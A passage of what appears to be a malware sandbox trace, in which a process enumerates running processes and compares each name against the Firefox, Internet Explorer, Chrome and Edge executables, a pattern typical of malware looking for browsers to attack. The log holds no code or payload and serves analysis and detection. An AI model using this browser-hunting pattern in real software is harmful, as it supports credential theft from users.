(in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.122] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0169.122] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0169.122] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0169.122] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.122] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0169.122] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0169.122] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0169.122] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0169.122] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.122] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.123] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0169.123] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0169.123] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0169.123] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.123] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0169.123] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0169.123] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0169.124] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0169.124] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.124] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0169.124] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0169.124] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0169.124] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0169.124] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.124] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0169.125] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0169.125] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0169.125] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0169.125] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.125] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0169.125] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0169.125] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0169.125] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0169.125] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.125] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.126] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.126] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.126] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.126] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.126] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.126] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.126] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.126] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.126] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.126] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.127] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.127] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.127] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.127] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.127] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.128] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.128] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.128] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.128] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.128] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.139] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.139] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.139] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.139] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.139] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0169.140] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0169.140] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0169.140] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0169.140] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.140] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.140] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.140] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.140] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.140] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.140] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.141] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.141] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.141] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.141] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.141] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0169.141] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0169.141] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0169.141] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0169.141] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.141] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0169.142] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0169.142] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0169.142] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0169.142] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.142] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0169.142] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0169.143] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0169.143] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0169.143] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.143] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.143] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.143] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.143] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.143] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.143] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0169.144] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0169.144] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0169.144] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0169.144] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.144] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0169.144] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0169.145] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0169.145] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0169.145] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.145] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0169.145] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0169.145] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0169.145] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0169.145] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.145] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0169.146] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0169.146] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0169.146] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0169.146] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.146] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0169.146] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0169.146] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0169.146] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0169.146] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.146] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0169.147] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0169.147] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0169.147] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0169.147] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.147] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0169.147] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0169.147] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0169.147] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0169.148] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.148] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0169.148] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0169.148] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0169.148] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0169.148] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.148] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0169.149] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0169.149] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0169.149] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0169.149] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0169.149] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0169.149] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0169.149] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0169.149] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0169.150] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0169.150] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0169.150] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0169.150] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.150] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0169.150] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0169.150] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0169.150] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0169.151] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.151] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0169.151] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0169.151] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0169.151] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0169.151] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.151] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0169.152] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0169.152] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0169.152] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0169.152] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0169.152] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0169.152] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0169.152] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0169.152] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0169.153] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0169.153] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0169.153] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0169.153] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.153] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0169.153] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0169.153] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0169.153] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0169.154] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.154] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0169.154] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0169.154] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0169.154] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0169.154] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.154] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0169.155] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0169.155] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0169.155] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0169.155] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.155] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0169.155] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0169.155] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0169.155] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0169.155] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.155] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0169.156] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0169.156] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0169.156] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0169.156] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.156] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0169.156] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0169.156] 